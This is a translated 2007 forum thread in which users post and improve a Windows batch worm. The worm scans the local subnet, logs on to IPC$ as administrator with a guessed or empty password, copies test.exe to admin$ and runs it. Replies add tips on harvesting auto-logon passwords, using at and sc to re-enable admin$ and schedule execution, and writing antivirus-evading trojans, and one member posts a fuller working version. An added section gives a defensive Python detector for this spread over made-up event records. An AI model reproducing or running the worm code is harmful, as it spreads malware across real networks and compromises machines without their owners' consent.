heicai (Intermediate user, registered 2007-1-19)
Post #1 (original post):
Example of using a batch file to spread a virus across a LAN via IPC$
REM LAN propagation
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2 | findstr /i "time<" && net use \\%IP%\ipc$ "1212" /user:"administrator" && copy test.exe \\%IP%\admin$ && start \\%IP%\admin$\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
A brief explanation of what it does: first it reads this computer's IP and works out the subnet it is on, then it pings each address in that subnet with a last octet of 1-254 in turn. If a host answers, the file is copied into its C:\windows\ directory and executed; if not, it moves on to the next IP until all 254 have been pinged.
Special thanks here to my friend "等待下一局" from the forum group, who stayed up with me until 2 AM working on this code.
I'm posting it here partly to share the result with everyone and partly in the hope of getting some pointers.
If there are mistakes, please point them out; if it can be improved, please help improve it!
Last edited by heicai on 2007-2-6 at 01:52 AM
2007-2-6 14:49

heicai
Post #2:
I'm studying this purely in a spirit of learning, with no malicious intent. Experts, please don't be stingy with your advice.
2007-2-7 01:03

vkill (Gold member, registered 2006-1-20, from 甘肃.临泽)
Post #3:
So you just know the password is "1212"???
2007-2-7 01:16

heicai
Post #4:
The password 1212 was just set arbitrarily; usually it's empty, isn't it? I felt that using a dictionary or the like would eat too much memory.
2007-2-7 03:38

kcdsw (Intermediate user, registered 2006-3-30)
Post #5:
Looks pretty powerful.
But I have one question: can start make another machine execute a file? I'm afraid it ends up executing on your own machine.
You could try 猫猫烧香.
2007-2-7 04:06

everest79 (Gold member, registered 2006-12-25)
Post #6:
You can first identify the local account name, or check the registry for an auto-logon record, which contains the current account's password.
If it isn't administrator, you can add administrator to the enumeration and use an empty password as the credential, though after SP2 the security policy does not allow remote access with an empty password.
In a place like an internet café, where the accounts are all the same, you can usually connect with the default account as long as the default shares and administrative shares haven't been turned off.
Also, XP ships with a tool for executing commands remotely; I can't remember the name, look it up.
2007-2-7 09:22

lm959680 (Newcomer, registered 2007-2-4)
Post #7:
rundll32 netplwiz.dll,UsersRunDll
I deleted the registry one, so I don't know the path any more. I also don't know whether, with the method above, it shows up in the registry?
2007-2-7 23:12

heicai
Post #8:
Originally posted by qingfushuan at 2007-2-7 10:32 AM:
Just a suggestion: what if admin$ has been removed? Better to use the net view command to see which shares the other side has open, and then copy.

Can you help me improve it?
2007-2-8 12:49

kernelv (Beginner user, registered 2007-1-9)
Post #9:
This hole is outdated; study something else. As the friend in post #6 said, after SP2 the security policy no longer allows remote access with an empty password.
Also, start can run a remote program? You're joking. If the other side's Task Scheduler service is running, a scheduled task would be closer to it.
Sorry, I may have dampened your enthusiasm somewhat, but no other malice intended.
2007-2-8 15:31

luobotou (Newcomer, registered 2006-9-29, from 河南省南阳市)
Post #10:
Right, it's fine if the other side's Task Scheduler service is running. And you also need to know the other side's administrator password.
net time \\%ip% /set /y
set/a hh=%time:~0,2%+0
set/a mm=1%time:~3,2%-100+1
if %mm% geq 60 (set/a mm=!mm!-60
set/a hh=!hh!+1
if %hh% geq 24 set/a hh=!hh!-24
)
at \\%ip% !hh!:!mm! %windir%\test.exe
This runs the specified program on the other machine in the next minute.
2007-3-8 00:24

h4ck3r (Newcomer, registered 2007-3-8)
Post #11:
Can the at command be used on XP SP2?
Heh, I tried and it didn't work.
2007-3-8 02:01

scriptor (Silver member, registered 2006-12-21)
Post #12:
Ancient stuff.
Who still uses this?
SP2 is already a lot safer than before.
2007-3-8 07:59

scriptor
Post #13:
Might as well make a trojan and drop it in.
Write your own trojan; it has to evade antivirus.
That said, I strongly oppose doing damage.
Maintaining network security is the responsibility of every one of us who understands the technology.
Technology is not for doing harm,
even though technology is a double-edged sword.
As a high-tech person,
you must first strengthen your own moral character;
only then
are you worthy of the name.
Thanks.
2007-3-8 08:02

bjsh (Silver member, registered 2007-1-1)
Post #14:
LZ's batch file has quite a few problems.
First, the line ping %IP% -n 2 | findstr /i "time<" && can miss a lot: many hosts that answer a ping don't print "time<" but "time=". Better to judge by errorlevel.
Second, copy test.exe \\%IP%\admin$: ordinary machines generally won't have admin$ enabled, so I first test whether this machine can be used via ipc$ at all:
sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
That is the line I use. On the one hand it tests whether the machine is worth going after (if you can't even change a service's settings over the remote connection, the at command won't run on it either; it will be refused access). Generally, if this step passes, the machine can be taken over completely. On the other hand it changes the start mode of Schedule (on most machines this is already on, of course).
net start Schedule
Then the at command can be used:
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$
So one minute later the other side's admin$ is enabled, and after that it's just copying the file and launching it..............
Below is my modified version..........
for /f "tokens=2 delims=:" %%a in ('ipconfig ^| find /i "ip address"') do (set ip=%%a&& goto :gof)
:gof
set "ip=%ip: =%"
for /f "tokens=1,2,3 delims=." %%b in ("%ip%") do (set ip1=1
call :bb %%b %%c %%d %ip1%)
:bb
set IP=%1.%2.%3.%ip1%
ping %IP% -n 2
if errorlevel 0 if not errorlevel 1 net use \\%IP%\ipc$ "" /user:administrator
if errorlevel 0 if not errorlevel 1 sc \\%ip% config Schedule start= auto ^| find "SUCCESS"
if errorlevel 0 if not errorlevel 1 sc start Schedule
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% net share admin$ ...............from here down I personally think is a bit redundant; might as well estimate the time yourself
:loop
if %time%==%tm%+1 (goto next) else (goto loop)
:next
copy test.exe \\%IP%\admin$
net time \\%ip% /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
set /a mm=%mm%+1
set tm=%hh%:0%mm%
at \\%ip% %tm% c:\windows\system32\test.exe
set /a ip1+=1
if %ip1% lss 255 goto :bb
exit
Last edited by bjsh on 2007-3-8 at 03:29 PM
2007-3-8 10:25

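Added example (not code from any post in this thread): the defensive counterpart to what the original post (net use to ipc$, copy to admin$, execute) and bjsh's variant (sc config Schedule, then an at job on the target) do on the wire. Both leave the same trace on each victim: a network logon as administrator from one source, an ADMIN$ share access, and a scheduled task creation, repeated host after host within minutes. The code below runs that correlation over constructed event records; the field names are a simplified subset of the Windows Security event properties named in the docstring, and the sample events are made up for the demonstration, not real logs.

```python
"""Detect the ipc$/admin$ fan-out pattern from the thread in Windows event records.

Added example, not code from any post. Field names are a constructed, simplified
subset of Windows Security event properties:
  4624/4625  network logon success/failure (logon_type 3, src_ip = IpAddress)
  5140       network share object accessed (share = ShareName)
  4698       scheduled task created (what `at \\host <time> ...` leaves behind)
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _t(s):
    return datetime.fromisoformat(s)


def _hop(target, src_ip, start):
    """Constructed records for one successful hop, in the order the batch file does it:
    net use \\\\host\\ipc$ -> copy to admin$ -> at \\\\host <time> test.exe (creates \\At1)."""
    t0 = _t(start)

    def at(sec):
        return (t0 + timedelta(seconds=sec)).isoformat(timespec="seconds")

    user = "administrator"
    return [
        {"time": at(0), "id": 4624, "computer": target, "src_ip": src_ip, "user": user, "logon_type": 3},
        {"time": at(1), "id": 5140, "computer": target, "src_ip": src_ip, "user": user, "share": "\\\\*\\IPC$"},
        {"time": at(2), "id": 5140, "computer": target, "src_ip": src_ip, "user": user, "share": "\\\\*\\ADMIN$"},
        {"time": at(5), "id": 4698, "computer": target, "user": user, "task": "\\At1"},
    ]


# Constructed sample, not real logs: 10.0.0.5 runs the script against four hosts
# (one rejects the hard-coded password); 10.0.0.9 is an ordinary user on one server.
SAMPLE_EVENTS = (
    _hop("PC-01", "10.0.0.5", "2007-02-06T14:49:00")
    + _hop("PC-02", "10.0.0.5", "2007-02-06T14:49:10")
    + _hop("PC-03", "10.0.0.5", "2007-02-06T14:49:20")
    + [
        {"time": "2007-02-06T14:49:30", "id": 4625, "computer": "PC-04", "src_ip": "10.0.0.5",
         "user": "administrator", "logon_type": 3},
        {"time": "2007-02-06T15:30:00", "id": 4624, "computer": "FILESRV", "src_ip": "10.0.0.9",
         "user": "jsmith", "logon_type": 3},
        {"time": "2007-02-06T15:30:01", "id": 5140, "computer": "FILESRV", "src_ip": "10.0.0.9",
         "user": "jsmith", "share": "\\\\*\\Public"},
    ]
)


def detect_fanout(events, window=timedelta(minutes=10), min_targets=3):
    """Flag each source IP that logs on over the network to >= min_targets distinct
    hosts inside `window`, and report the admin$ access, task creation and failed
    logons it produced in that window. Returns one finding dict per flagged source."""
    logons = defaultdict(list)  # src_ip -> [(time, target host)]
    for e in events:
        if e["id"] == 4624 and e.get("logon_type") == 3:
            logons[e["src_ip"]].append((_t(e["time"]), e["computer"]))

    findings = []
    for src, hops in logons.items():
        hops.sort()
        for i, (start, _) in enumerate(hops):
            end = start + window
            hosts = sorted({h for t, h in hops[i:] if t <= end})
            if len(hosts) < min_targets:
                continue  # slide the window forward
            in_win = [e for e in events if start <= _t(e["time"]) <= end]
            admin_shares = sorted({e["computer"] for e in in_win
                                   if e["id"] == 5140 and e.get("src_ip") == src
                                   and e["share"].upper().endswith("ADMIN$")})
            tasks = [e for e in in_win if e["id"] == 4698 and e["computer"] in hosts]
            failed = [e for e in in_win if e["id"] == 4625 and e.get("src_ip") == src]
            findings.append({
                "src_ip": src,
                "window_start": start.isoformat(timespec="seconds"),
                "targets": hosts,
                "admin_share_targets": admin_shares,
                "scheduled_tasks": len(tasks),
                "failed_logons": len(failed),
                # fan-out alone is medium; admin$ writes or at-jobs make it high
                "severity": "high" if admin_shares or tasks else "medium",
            })
            break  # one finding per source; later windows overlap this one
    return findings


if __name__ == "__main__":
    for f in detect_fanout(SAMPLE_EVENTS):
        print(f)
```

The thresholds (three hosts in ten minutes) are assumptions for the sample; on a real network tune them against the normal fan-out of your management hosts, and feed the function the real IpAddress/ShareName/TaskName fields instead of the constructed ones. The 4625 count is what a hard-coded or guessed password like "1212" produces on hosts where it is wrong, so it usually appears alongside the successes.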
heicai
Post #15:
Originally posted by bjsh at 2007-3-8 10:25 AM:
LZ's batch file has quite a few problems.
First, the line ping %IP% -n 2 | findstr /i "time<" && can miss a lot;
many hosts that answer a ping don't print "time<" but "time ...

I found that the code stops once it gets to checking 192.168.0.1.
2007-5-28 17:39